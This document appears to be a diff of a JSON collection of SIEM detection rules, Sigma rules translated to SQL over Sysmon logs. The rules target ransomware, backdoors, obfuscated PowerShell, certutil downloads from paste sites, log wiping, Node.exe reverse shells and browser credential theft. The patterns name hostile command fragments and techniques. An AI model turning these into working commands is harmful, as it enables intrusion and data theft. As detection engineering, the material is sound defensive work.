"falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 
'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", 
"status": "test", - "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. 
Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" - }, - { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects 
the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.009" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron 
Systems)", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "False positives may occur if a user called rundll32 from CLI with no options" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "status": "test", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' 
AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", + "status": "test", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "author": "frack113", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\tor.exe' ESCAPE '\\' OR Image LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND 
NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": 
"Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - 
"title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE 